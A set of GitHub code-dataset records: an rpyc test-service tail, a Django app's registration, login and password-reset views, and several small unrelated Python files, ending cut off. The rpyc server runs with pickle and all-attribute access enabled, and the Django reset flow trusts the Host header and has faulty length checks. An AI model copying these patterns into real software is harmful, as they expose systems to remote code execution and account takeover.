Exiting gracefully')\n sys.exit(0)\n\n # install packages needed\n # os.system(\"apt-get install -y iputils-arping\")\n # os.system(\"pip install pybrctl\")\n # os.system(\"pip install pyroute2\")\n\n signal(SIGINT, handler)\n protocol_config = {\"allow_pickle\": True, \"sync_request_timeout\": 300, \"allow_public_attrs\": True, \"allow_all_attrs\": True, \"instantiate_oldstyle_exceptions\": True}\n t = ThreadedServer(data[\"scapyServiceObj\"], port=8009, logger=logger, protocol_config=protocol_config, backlog=1)\n t.start()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sonic-net/sonic-mgmt","sub_path":"spytest/spytest/tgen/scapy/rpyc-service.py","file_name":"rpyc-service.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"51"} +{"seq_id":"7674565814","text":"from django.http import HttpResponse, Http404, HttpResponseRedirect, JsonResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom django.core.files.storage import FileSystemStorage\nfrom django.core.mail import send_mail\nfrom django.utils.crypto import get_random_string\nfrom django.conf import settings\n\nimport os\nimport requests\n\n# Get custom models\nfrom .models import feedback_content, account_settings\n\n# Used to store password recovery urls\nrecovery_url_email = {}\nrecovery_email_url = {}\nrecovery_urls = []\n\n# Create your views here.\ndef handler403(request, *args, **argv):\n return render(request, \"TeekerApp/403.html\", status=403)\n\ndef handler404(request, *args, **argv):\n return render(request, \"TeekerApp/404.html\", status=404)\n\ndef handler500(request, *args, **argv):\n return render(request, \"TeekerApp/500.html\", status=500)\n\n\ndef index(request, search=None):\n \"\"\"Used for Home page\"\"\"\n\n # Check if the user is Staff (Only Staff are allowed to view this page)\n if not request.user.is_staff:\n return render(request, \"TeekerApp/not_staff.html\")\n\n if request.method == \"GET\":\n if not search:\n search=\"oyrq-qzOx1U\" # If no searches have been made use this as default\n\n try:\n url = f'https://www.googleapis.com/youtube/v3/videos?id={search}&key={settings.GOOGLE_API}&part=status'\n url_get = requests.get(url)\n if url_get.json()[\"items\"][0][\"status\"][\"publicStatsViewable\"]:\n print(\"Video is publicly available\")\n else:\n print(\"Video not publicly available\")\n search=\"oyrq-qzOx1U\" # If no searches have been made use this as default\n except:\n search=\"oyrq-qzOx1U\"\n print(\"Video does not exist.\")\n \n try:\n f = account_settings.objects.get(owner=int(request.user.pk)).profile_picture\n if not f:\n f = \"images/421-4213053_default-avatar-icon-hd-png-download-crop-u29550_2x.jpg?crc=3789372887\"\n except account_settings.DoesNotExist:\n f = \"images/421-4213053_default-avatar-icon-hd-png-download-crop-u29550_2x.jpg?crc=3789372887\"\n\n print(f)\n\n html_content = {\"message\": \"G\",\n \"title\": \"My Morning Vibes\",\n \"username\": \"Megan2020\",\n \"description\": \"The air smells like flowers and the sun shines like gold.\",\n \"average_rating\": 8,\n \"youtube_easteregg\": search,\n \"counter\": [\"1\", \"2\", \"3\"],\n \"profile_img\": f}\n\n return render(request, \"TeekerApp/index.html\", html_content)\n\n\ndef search_bar(request): # For now this is just used as a Alpha Easter Egg\n \"\"\" Displays the profile of other users in a different 
way compared to when you own the account. \"\"\"\n\n # Check if the user is Staff (Only Staff are allowed to view this page)\n if not request.user.is_staff:\n return render(request, \"TeekerApp/not_staff.html\")\n\n if request.method == \"POST\":\n\n if request.POST[\"search\"]:\n yt_video = str(request.POST[\"search\"])\n else:\n print(\"Nothing to search...\")\n\n return HttpResponseRedirect(reverse(\"index_search\", args=(yt_video,)))\n\n\ndef get_client_ip(request):\n \"\"\" Used in register for reCAPTCHA verification. This gets the users Public IP address \"\"\"\n x_forwarded_for = request.META.get(\"HTTP_X_FORWARDED_FOR\")\n if x_forwarded_for:\n ip = x_forwarded_for.split(\",\")[0]\n else:\n ip = request.META.get(\"REMOTE_ADDR\")\n return ip\n\ndef register(request):\n \"\"\"Used for sign up/register page\"\"\"\n\n # Make sure the user is sent to the home page\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse(\"index\"))\n\n # Check if the request is POST\n if request.method == \"POST\":\n\n # Get the credentials to use to register the user\n username = str(request.POST[\"username\"])\n first_name = str(request.POST[\"first_name\"])\n last_name = str(request.POST[\"last_name\"])\n e_mail = str(request.POST[\"email\"])\n password = str(request.POST[\"pwd\"])\n passwordconfirm = str(request.POST[\"cpwd\"])\n\t\t\n # Used later for phone number authentication to prevent spam accounts\n # The code to save this to the Database will need to be written later\n #phonenumber = str(request.POST[\"phonenumber\"])\n\n # Check if the check box was ticket that says that the user agrees with the Terms and Conditions\n try:\n request.POST[\"custom_U1133\"]\n except KeyError:\n return render(request, \"TeekerApp/register.html\", {\"message\": \"You didn't agree to the Terms And Conditions!\"})\n\n # Check if the reCAPTCHA was successful (reCAPTCHA v2.0)\n try:\n if not request.POST[\"g-recaptcha-response\"]:\n return render(request, \"TeekerApp/register.html\", {\"message\": \"Failed to check reCAPTCHA.\"})\n else:\n captcha_rs = request.POST[\"g-recaptcha-response\"]\n url = \"https://www.google.com/recaptcha/api/siteverify\"\n params = {\n \"secret\": settings.RECAPTCHA_SECRET_KEY,\n \"response\": captcha_rs,\n \"remoteip\": get_client_ip(request),\n \"success\": True|False,\n \"hostname\": settings.ALLOWED_HOSTS\n }\n verify_rs = requests.get(url, params=params, verify=True)\n verify_rs = verify_rs.json()\n if not verify_rs[\"success\"]:\n return render(request, \"TeekerApp/register.html\", {\"message\": \"reCAPTCHA not valid. Try again in 1 minute.\"})\n except KeyError:\n return render(request, \"TeekerApp/register.html\", {\"message\": \"Failed to check reCAPTCHA.\"})\n\n # Check if the Password matches the requirements\n if len(password) > 7 and len(password) < 65:\n if password != passwordconfirm:\n return render(request, \"TeekerApp/register.html\", {\"message\": \"Passwords don't match!\"})\n else:\n return render(request, \"TeekerApp/register.html\", {\"message\": \"Password too short! Please make it longer then 8 characters and less the 64.\"})\n\n # Iniatialize variable\n result = {}\n\n # Check if the username already exists in the Database\n try:\n User.objects.get(username=username)\n result[\"USERNAME_CHECK\"] = True\n except User.DoesNotExist:\n result[\"USERNAME_CHECK\"] = False\n\n # If the username does exist send a message\n if result[\"USERNAME_CHECK\"]:\n return render(request, \"TeekerApp/register.html\", {\"message\": \"username exists! 
Please use another one.\"})\n\n # Check if the email already exists in the Database\n try:\n User.objects.get(email=e_mail)\n result[\"EMAIL_CHECK\"] = True\n except User.DoesNotExist:\n result[\"EMAIL_CHECK\"] = False\n \n # If the username does exist send a message\n if result[\"EMAIL_CHECK\"]:\n return render(request, \"TeekerApp/register.html\", {\"message\": \"email exists! Please use another one.\"})\n \n # If the credentials are valid register the user to the Database\n if not result[\"EMAIL_CHECK\"] and not result[\"USERNAME_CHECK\"]:\n f = User.objects.create_user(username=username,\n email=e_mail,\n first_name=first_name,\n last_name=last_name,\n password=password)\n f.save() # Save the new users details to the Database\n\n account_settings(owner=int(request.user.pk),\n news_letter=False # For now the News letter option will stay Disabled till futher notice\n ).save()\n \n # Send the new user a email\n send_mail(\"Welcome To Teeker\",\n \"\"\"Welcome to Teeker. \n Thank You For Joining our Community, we hope you have fun. \n Don't reply to this email.\"\"\",\n os.getenv(\"EMAIL\"),\n [e_mail],\n fail_silently=False,\n html_message=\"\"\"

    Welcome To Teeker
    \n
    \n Thank You For Joining our Community, have FUN!\n
    \n
    \n Don't reply to this email.\"\"\")\n return HttpResponseRedirect(reverse(\"index\"))\n\n return render(request, \"TeekerApp/register.html\")\n\n\ndef register_validation(request, option):\n \"\"\" Used by the Register page Javascript to check if the user has valid credidentionals \"\"\"\n\n # Check if the username already exists in the Database\n if option == \"username\":\n username = str(request.POST[\"username\"])\n try:\n User.objects.get(username=username)\n return JsonResponse({\"STATUS\": False})\n except User.DoesNotExist:\n return JsonResponse({\"STATUS\": True})\n \n # Check if the email address already exists in the Datavase\n elif option == \"email\":\n email = str(request.POST[\"email\"])\n try:\n User.objects.get(email=email)\n return JsonResponse({\"STATUS\": False})\n except User.DoesNotExist:\n return JsonResponse({\"STATUS\": True})\n\n return JsonResponse({\"STATUS\": True})\n\n\ndef login_page(request):\n \"\"\" Used for Login Page \"\"\"\n\n # Check if the user if still logged in or not\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse(\"index\"))\n\n if request.method == \"POST\":\n\n # Get the credentials from the input fields\n username = str(request.POST[\"username\"])\n pwd = str(request.POST[\"pwd\"])\n\n # Check if the credentials are valid\n user = authenticate(request, username=username, password=pwd)\n\n # Log the user in if the credentials are valied\n if user:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"TeekerApp/login.html\", {\"message\": \"Invalid username/email or password!\"})\n\n return render(request, \"TeekerApp/login.html\")\n\t\ndef logout_page(request):\n \"\"\" Used for logging out the user \"\"\"\n \n logout(request) # Log out the user from the server\n \n return HttpResponseRedirect(reverse(\"login\"))\n\n\ndef forgot_pwd(request, html_content=None):\n \"\"\" Used for recovering user password \"\"\"\n\n # Make sure the user is sent to the home page\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse(\"index\"))\n\n if request.method == \"POST\":\n\n # Check if the email the user gave exists in the Database\n email = str(request.POST[\"email\"])\n try:\n User.objects.get(email=email)\n except User.DoesNotExist:\n html_content = {\n \"option\": \"email\",\n \"message\": \"User with that email address does not exist.\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n\n # Store the users credentials in f\n f = User.objects.get(email=email)\n while True:\n\n # Get a random string to make the random URL\n r_url = str(get_random_string(length=32))\n\n # Check if the string doesn't exist in the URL list\n if r_url not in recovery_urls:\n\n # Check if the email address is already waiting\n try:\n if recovery_email_url[email]:\n\n html_content = {\n \"option\": \"email\",\n \"message\": \"Email already sent. If you haven't recieved the email please contact Support. 
ERx2\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n except KeyError:\n recovery_urls.append(r_url) # Place the random string URL in the list\n recovery_email_url[email] = r_url # Place the random string URL in the dictionary with the key being the email address\n recovery_url_email[r_url] = email # Place the email address in the dictionary with the key being the random string URL\n\n # Send the random string URL to the email address provided by the user\n send_mail(\"Forgot Password\",\n \"\"\"Forgot Your password?\n Use this link: \"\"\"+str(request.META[\"HTTP_HOST\"])+\"/forgot_pwd/\"+r_url,\n os.getenv(\"EMAIL\"),\n [f.email],\n fail_silently=False,\n html_message=\"\"\"

    Forgot Your Password?
    \n
    Use this Link to recover your account:
    \"\"\"+str(request.META[\"HTTP_HOST\"])+\"/forgot_pwd/\"+r_url+\"\"\"\n
    \n Don't reply to this email.\"\"\")\n break # Break the loop\n html_content = {\n \"option\": \"email\",\n \"success_message\": \"Check your inbox now. (If you can't find it check the spam mail)\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n\n elif request.method == \"GET\":\n if not html_content:\n html_content = {\n \"option\": \"email\",\n \"message\": \"\"\n }\n\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n\n\ndef forgot_pwd_handler(request, option):\n \"\"\" Used to handle the forgot password URL and password changes \"\"\"\n\n # Make sure the user is sent to the home page\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse(\"index\"))\n\n # Check if the URL in the option variable doesn't exists in the 'recovery_urls' list\n if option not in recovery_urls:\n return HttpResponseRedirect(reverse(\"forgot_pwd\")) # Redirect user to the page where they have to put the email address\n\n html_content = {\n \"option\": \"pwd\",\n \"url\": option\n }\n\n return render(request, \"TeekerApp/forgot_pwd_2.html\", html_content)\n\n\ndef forgot_pwd_change(request, option):\n \"\"\" Used to update the account password to the new one. \"\"\"\n\n # Make sure the user is sent to the home page\n if request.user.is_authenticated:\n return HttpResponseRedirect(reverse(\"index\"))\n\n if request.method == \"POST\":\n\n # Collect all data from input fields\n url = str(request.POST[\"ust_url\"])\n pwd = str(request.POST[\"pwd\"])\n cpwd = str(request.POST[\"cpwd\"])\n\n # Check if the reCAPTCHA was successful (reCAPTCHA v2.0)\n try:\n if not request.POST[\"g-recaptcha-response\"]:\n html_content = {\n \"option\": \"email\",\n \"message\": \"Failed to check reCAPTCHA.\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n else:\n captcha_rs = request.POST[\"g-recaptcha-response\"]\n url_recaptcha = \"https://www.google.com/recaptcha/api/siteverify\"\n params = {\n \"secret\": settings.RECAPTCHA_SECRET_KEY,\n \"response\": captcha_rs,\n \"remoteip\": get_client_ip(request)\n }\n verify_rs = requests.get(url_recaptcha, params=params, verify=True)\n verify_rs = verify_rs.json()\n if not verify_rs[\"success\"]:\n html_content = {\n \"option\": \"email\",\n \"message\": \"reCAPTCHA not valid. 
Try again in 1 minute.\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n except KeyError:\n html_content = {\n \"option\": \"email\",\n \"message\": \"Failed to check reCAPTCHA.\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n\n # Check if the new password meets requirements\n if len(pwd) > 7 or len(pwd) < 65 and len(cpwd) > 7 or len(cpwd) < 65:\n\n # Check if the new password and confirm password match\n if pwd == cpwd:\n \n if url in recovery_urls:\n email = recovery_url_email[url] # Get the email address related to the url key\n \n # Update the users password\n f = User.objects.get(email=email)\n f.set_password(pwd)\n f.save()\n\n # Remove the URL and email address from the list and dictionary\n try:\n recovery_urls.remove(url)\n del recovery_email_url[email]\n del recovery_url_email[url]\n except KeyError:\n print(\"Failed to remove URL and Email address from Recovery Password.\")\n\n return HttpResponseRedirect(reverse(\"index\")) # Send user to home page\n else:\n html_content = {\n \"option\": \"email\",\n \"message\": \"URL broken!\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n else:\n html_content = {\n \"option\": \"email\",\n \"message\": \"The passwords don't match!\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n else:\n html_content = {\n \"option\": \"email\",\n \"message\": \"Your new password does not meet our requirements.\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n else:\n html_content = {\n \"option\": \"email\",\n \"message\": \"Something went wrong.\"\n }\n return render(request, \"TeekerApp/forgot_pwd.html\", html_content)\n\n return HttpResponseRedirect(reverse(\"forgot_pwd\"))\n \n\ndef account(request):\n \"\"\" Used for account page to display Account information \"\"\"\n \n html_content = {\"\":\"\"}\n\n # Check if the user is Staff (Only Staff are allowed to view this page)\n if not request.user.is_staff:\n return render(request, \"TeekerApp/not_staff.html\", html_content)\n \n return render(request, \"TeekerApp/account.html\", html_content)\n\n\ndef feedback(request):\n \"\"\" Used for giving feedback. Mostly looking for bug issue reports. \"\"\"\n\n # Check if the user is Staff (Only Staff are allowed to view this page)\n if not request.user.is_staff:\n return render(request, \"TeekerApp/not_staff.html\")\n\n if request.method == \"POST\":\n\n if request.POST[\"subject\"]:\n subject_v = str(request.POST[\"subject\"])\n\n if request.POST[\"message\"]:\n message_v = str(request.POST[\"message\"])\n\n # Check if the reCAPTCHA was successful (reCAPTCHA v2.0)\n try:\n if not request.POST[\"g-recaptcha-response\"]:\n html_content = {\"alert_message\": \"Failed to check reCAPTCHA.\"}\n else:\n captcha_rs = request.POST[\"g-recaptcha-response\"]\n url_recaptcha = \"https://www.google.com/recaptcha/api/siteverify\"\n params = {\n \"secret\": settings.RECAPTCHA_SECRET_KEY,\n \"response\": captcha_rs,\n \"remoteip\": get_client_ip(request)\n }\n verify_rs = requests.get(url_recaptcha, params=params, verify=True)\n verify_rs = verify_rs.json()\n if not verify_rs[\"success\"]:\n html_content = {\"alert_message\": \"reCAPTCHA not valid. 
Try again in 1 minute.\"}\n                except KeyError:\n                    html_content = {\"alert_message\": \"Failed to check reCAPTCHA.\"}\n\n
                feedback_content(owner=int(request.user.pk),\n                                 subject=subject_v,\n                                 feedback=message_v).save()\n\n
                # Get all FeedBack Data\n                p_feedback = feedback_content.objects.all()\n                if p_feedback:\n                    feedback_html_c = []\n                    for i in p_feedback:\n                        p_user = User.objects.get(pk=int(i.owner))\n                        feedback_html_c.append({\n                            \"username\": p_user.username,\n                            \"subject\": i.subject,\n                            \"feedback_message\": i.feedback,\n                            \"date\": i.date\n                        })\n\n
                    html_content = {\n                        \"feedback_html\": feedback_html_c,\n                        \"success_message\": \"FeedBack has been Received and will be viewed soon! Thank You.\"\n                    }\n                else:\n                    html_content = {\"success_message\": \"FeedBack has been Received and will be viewed soon! Thank You.\"}\n\n
                return render(request, \"TeekerApp/feedback.html\", html_content)\n            else:\n                html_content = {\"alert_message\": \"FeedBack Message missing!\"}\n                return render(request, \"TeekerApp/feedback.html\", html_content)\n        else:\n            html_content = {\"alert_message\": \"Subject is missing!\"}\n            return render(request, \"TeekerApp/feedback.html\", html_content)\n\n
    elif request.method == \"GET\":\n\n        # Get all FeedBack Data\n        p_feedback = feedback_content.objects.all()\n        if p_feedback:\n            feedback_html_c = []\n            for i in p_feedback:\n                p_user = User.objects.get(pk=int(i.owner))\n                feedback_html_c.append({\n                    \"username\": p_user.username,\n                    \"subject\": i.subject,\n                    \"feedback_message\": i.feedback,\n                    \"date\": i.date\n                })\n\n
            html_content = {\n                \"feedback_html\": feedback_html_c\n            }\n        else:\n            html_content = {\"\":\"\"}\n\n
        return render(request, \"TeekerApp/feedback.html\", html_content)\n\n\n
def settings_page(request):\n    \"\"\" Used to show the user's account settings and allow them to modify them. \"\"\"\n\n
    # Check if the user is Staff (Only Staff are allowed to view this page)\n    if not request.user.is_staff:\n        return render(request, \"TeekerApp/not_staff.html\")\n\n
    try:\n        f = account_settings.objects.get(owner=int(request.user.pk))\n        if f:\n            html_content = {\n                \"news_letter\": f.news_letter,\n                \"inbox_notifications\": f.inbox_notifications,\n                \"browser_notifications\": f.browser_notifications\n            }\n
    except account_settings.DoesNotExist:\n        html_content = {\n            \"news_letter\": False,\n            \"inbox_notifications\": False,\n            \"browser_notifications\": False\n        }\n\n
    # I don't know if this should be here or not (This might be removed in the future)\n    account_settings(owner=int(request.user.pk),\n                     news_letter=False # For now the News letter option will stay Disabled till further notice\n                     ).save()\n\n
    return render(request, \"TeekerApp/settings.html\", html_content)\n\n\n
def inbox(request):\n    \"\"\" Shows the messages the user has received from other users. A little communication page. \"\"\"\n\n
    html_content = {\"\":\"\"}\n\n
    # Check if the user is Staff (Only Staff are allowed to view this page)\n    if not request.user.is_staff:\n        return render(request, \"TeekerApp/not_staff.html\", html_content)\n\n
    return render(request, \"TeekerApp/inbox.html\", html_content)\n\n\n
def subscriptions(request):\n    \"\"\" Shows the content posted by the users this user is following. 
\"\"\"\n\n html_content = {\"\":\"\"}\n\n # Check if the user is Staff (Only Staff are allowed to view this page)\n if not request.user.is_staff:\n return render(request, \"TeekerApp/not_staff.html\", html_content)\n\n return render(request, \"TeekerApp/subscriptions.html\", html_content)\n\n\ndef upload_post(request):\n \"\"\" Used to upload the users content to our database and server. \"\"\"\n\n html_content = {\"\":\"\"}\n\n # Check if the user is Staff (Only Staff are allowed to view this page)\n if not request.user.is_staff:\n return render(request, \"TeekerApp/not_staff.html\", html_content)\n\n return render(request, \"TeekerApp/upload_post.html\", html_content)\n\n\ndef visitor_account_view(request):\n \"\"\" Displays the profile of other users in a different way compared to when you own the account. \"\"\"\n\n html_content = {\"\":\"\"}\n\n # Check if the user is Staff (Only Staff are allowed to view this page)\n if not request.user.is_staff:\n return render(request, \"TeekerApp/not_staff.html\", html_content)\n\n return render(request, \"TeekerApp/visitor_account_view.html\", html_content)\n\n ","repo_name":"TeekerApp/Teeker","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":25802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"72564733919","text":"import socket \n\ndef client():\n try:\n cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print(\"[C]: Client socket created\")\n except socket.error as err:\n print('socket open error: {} \\n'.format(err))\n exit()\n \n # Define the port on which you want to connect to the server\n port = 50007\n localhost_addr = socket.gethostbyname(socket.gethostname())\n\n # connect to the server on local machine\n server_binding = (localhost_addr, port)\n cs.connect(server_binding)\n\n # Receive data from the server\n\n # data_from_server=cs.recv(100)\n # print(\"[C]: Data received from server: {}\".format(data_from_server.decode('utf-8'))\n readFilePtr = open(\"in-proj.txt\", \"r\")\n writeFilePtr = open(\"output.txt\", \"w\")\n count = 0; \n for line in readFilePtr:\n cs.send(line.encode('utf-8'))\n data_from_server = cs.recv(300)\n data_from_server = data_from_server.decode('utf-8')\n writeFilePtr.write(data_from_server + \"\\n\")\n writeFilePtr.close()\n\n # close the client socket\n cs.close()\n exit()","repo_name":"omshah0111/Socket-Programming-","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"23500470772","text":"from typing import List\n\nfrom fastapi import APIRouter, Depends\n\nfrom src.schemas import UserRequestSchema, UserResponseSchema\n\nfrom src.database.queries import get_user_query, create_user_query, get_all_users\n\n\nuser_router = APIRouter(prefix=\"\", tags=[\"register\"])\n\n\n@user_router.post(\n \"/register\",\n summary=\"Регистрация пользователей\",\n status_code=201\n)\nasync def register(user: UserRequestSchema = Depends(create_user_query)):# -> UserResponseSchema:\n res = await create_user_query(user)\n return res\n\n\n@user_router.get(\n \"/users\",\n summary=\"Получить всех пользователей\"\n)\nasync def get_users() -> List[UserResponseSchema]:\n user_list = await get_all_users()\n return 
user_list\n","repo_name":"denisakhmetovdev/AuthService","sub_path":"src/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"36955371905","text":"from unittest import TestCase\nimport pandas as pd\nimport pytest\n\nfrom landbosse.model import SubstationCost\n\n\nclass TestSubstationCost(TestCase):\n\n def setUp(self):\n self.input_dict = dict()\n self.input_dict['interconnect_voltage_kV'] = 1\n self.input_dict['project_size_megawatts'] = 1\n self.project_name = 'Project_1'\n self.output_dict = dict()\n\n # self.input_dict['turbine_rating_MW'] = 1.5\n # self.input_dict['num_turbines'] = 15\n # self.input_dict['project_size_megawatts'] = self.input_dict[\n # 'num_turbines'] * self.input_dict['turbine_rating_MW'] # MW\n # self.input_dict['rotor_diameter_m'] = 75\n\n def test_SubstationCostModule(self):\n \"\"\"\n Black box test to check whether module is ran successfully or not\n \"\"\"\n run_SubstationCost = SubstationCost(input_dict=self.input_dict, output_dict=self.output_dict, project_name=self.project_name)\n trial_run = run_SubstationCost.run_module()\n\n\n if trial_run[0] == 0 :\n print('\\n\\n================== MODULE EXECUTION SUCCESS =========================\\n')\n print(' SubstationCost module ran successfully. See the list of inputs'\n '\\n and outputs below used by the module in its calculations:')\n print( '\\n=====================================================================\\n')\n\n\n elif trial_run[0] == 1 :\n print('\\n\\n================== MODULE EXECUTION FAILURE ==================\\n')\n print(' SubstationCost module failed to run successfully. See the list'\n '\\n of inputs below used by the module in its calculations:')\n print('\\n================================================================\\n')\n\n\n print('\\nGiven below is the set of inputs fed into SubstationCost module:\\n')\n for key, value in self.input_dict.items():\n print(key, ':', value)\n\n if trial_run[0] == 0: # Only print outputs if module ran successfully.\n print('\\nGiven below is the set of outputs calculated by the SubstationCost module:\\n')\n for key, value in self.output_dict.items():\n if isinstance(value, pd.DataFrame):\n print('\\nNow printing DataFrame ->', key, ':\\n', value)\n else:\n print(key, ':', value)","repo_name":"WISDEM/LandBOSSE","sub_path":"landbosse/tests/model/test_SubstationCost.py","file_name":"test_SubstationCost.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"51"} +{"seq_id":"33688676260","text":"class Solution:\n def validPalindrome(self, s: str) -> bool:\n n = len(s)\n sR = s[::-1]\n if s == sR:\n return True\n for i in range(n):\n if s[i] != sR[i]:\n ans1 = s[:i]+s[i+1:]\n ans2 = sR[:i]+sR[i+1:]\n if ans1 == ans1[::-1] or ans2 == ans2[::-1]:\n return True\n else:\n return False\n return True\n","repo_name":"Liuzhch1/leetcode","sub_path":"剑指Offer专项突击/字符串/p021.py","file_name":"p021.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"216191114","text":"from django.contrib.auth.models import User\nfrom django.db.models import Sum, F\n\nfrom DriveWatch.models import Ride, TankFilling\n\n\ndef get_last_tank_filling_data_summary():\n tank_filling = TankFilling.objects.filter(date__isnull=False).last()\n if tank_filling == None:\n return dict()\n\n 
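# each rider pays a share of the last tank's cost in proportion to distance driven; rides with no user are shared rides whose cost is split evenly further down\n    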
result = dict()\n user_data = list()\n\n result[\"total_money\"] = tank_filling.money\n\n users = User.objects.all()\n\n ride_queryset = Ride.objects.filter(tank_filling=tank_filling)\n total_sum_distance = ride_queryset.aggregate(\n sum=Sum(F(\"distance\"))\n )[\"sum\"]\n total_sum_distance = total_sum_distance if total_sum_distance else 0\n\n together_sum_distance = ride_queryset.filter(user__isnull=True).aggregate(\n sum=Sum(F(\"distance\"))\n )[\"sum\"]\n together_sum_distance = together_sum_distance if together_sum_distance else 0\n\n result[\"together_distance\"] = together_sum_distance\n try:\n together_money = (together_sum_distance / total_sum_distance) * tank_filling.money\n except ZeroDivisionError:\n together_money = 0\n result[\"together_money\"] = round(together_money, 2)\n\n for user in users:\n sum_distance = ride_queryset.filter(user=user).aggregate(\n sum=Sum(F(\"distance\"))\n )[\"sum\"]\n sum_distance = sum_distance if sum_distance else 0\n\n try:\n money = (sum_distance / total_sum_distance) * tank_filling.money\n except ZeroDivisionError:\n money = 0\n\n user_data.append(\n {\n \"id\": user.id,\n \"distance\": round(sum_distance, 2),\n \"money\": round(money, 2),\n \"calculated_money\": round(money + together_money / 2, 2)\n }\n )\n result[\"user_data\"] = user_data\n return result\n","repo_name":"leonxs2001/HomeServer","sub_path":"DriveWatch/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12231923585","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('webapollo_sso', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='UserMapping',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('apollo_user_id', models.IntegerField(unique=True)),\n ('apollo_user_name', models.CharField(max_length=100)),\n ('apollo_user_pwd', models.CharField(max_length=50)),\n ('last_date', models.DateTimeField(auto_now=True)),\n ('django_user', models.OneToOneField(null=True, blank=True, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","repo_name":"childers/genomics-workspace","sub_path":"webapollo_sso/migrations/0002_usermapping.py","file_name":"0002_usermapping.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"4674454546","text":"#!/usr/bin/env python3\nimport json\nimport subprocess\n\nfrom progress.bar import Bar\nfrom progress.spinner import Spinner\n\n\ndef scrape_all_recipes():\n bar = Bar(\"Loading recipes\", max=91465)\n\n recipe_list = []\n\n with open(\"dedup.json\") as dataset:\n for i, line in enumerate(dataset.readlines()):\n data = json.loads(line)\n\n recipe_list.append(data)\n\n bar.next()\n\n bar.finish()\n\n return recipe_list\n\n\nrecipes = scrape_all_recipes()\n\n\ndef cleanUnicode(s):\n \"\"\"\n Replace unicode fractions with ascii representation\n\n '⅛' => '1/8'\n \"\"\"\n\n unicode_map = {\n # fractions\n \"⅛\": \"1/8\",\n \"⅜\": \"3/8\",\n \"⅝\": \"5/8\",\n \"⅞\": \"7/8\",\n \"⅙\": \"1/6\",\n \"⅚\": \"5/6\",\n \"⅕\": \"1/5\",\n \"⅖\": \"2/5\",\n \"⅗\": \"3/5\",\n \"⅘\": \"4/5\",\n \"¼\": \"1/4\",\n \"¾\": \"3/4\",\n \"⅓\": \"1/3\",\n 
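`get_last_tank_filling_data_summary` above writes the `distance / total * money` split, complete with its `ZeroDivisionError` guard, three separate times; a hypothetical helper (the name `proportional_share` is mine) that factors the pattern out:

```python
def proportional_share(part: float, total: float, money: float) -> float:
    """Split `money` in proportion to part/total; 0 when nothing was driven."""
    try:
        return round((part / total) * money, 2)
    except ZeroDivisionError:
        return 0.0

assert proportional_share(30.0, 120.0, 60.0) == 15.0
assert proportional_share(30.0, 0.0, 60.0) == 0.0
```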
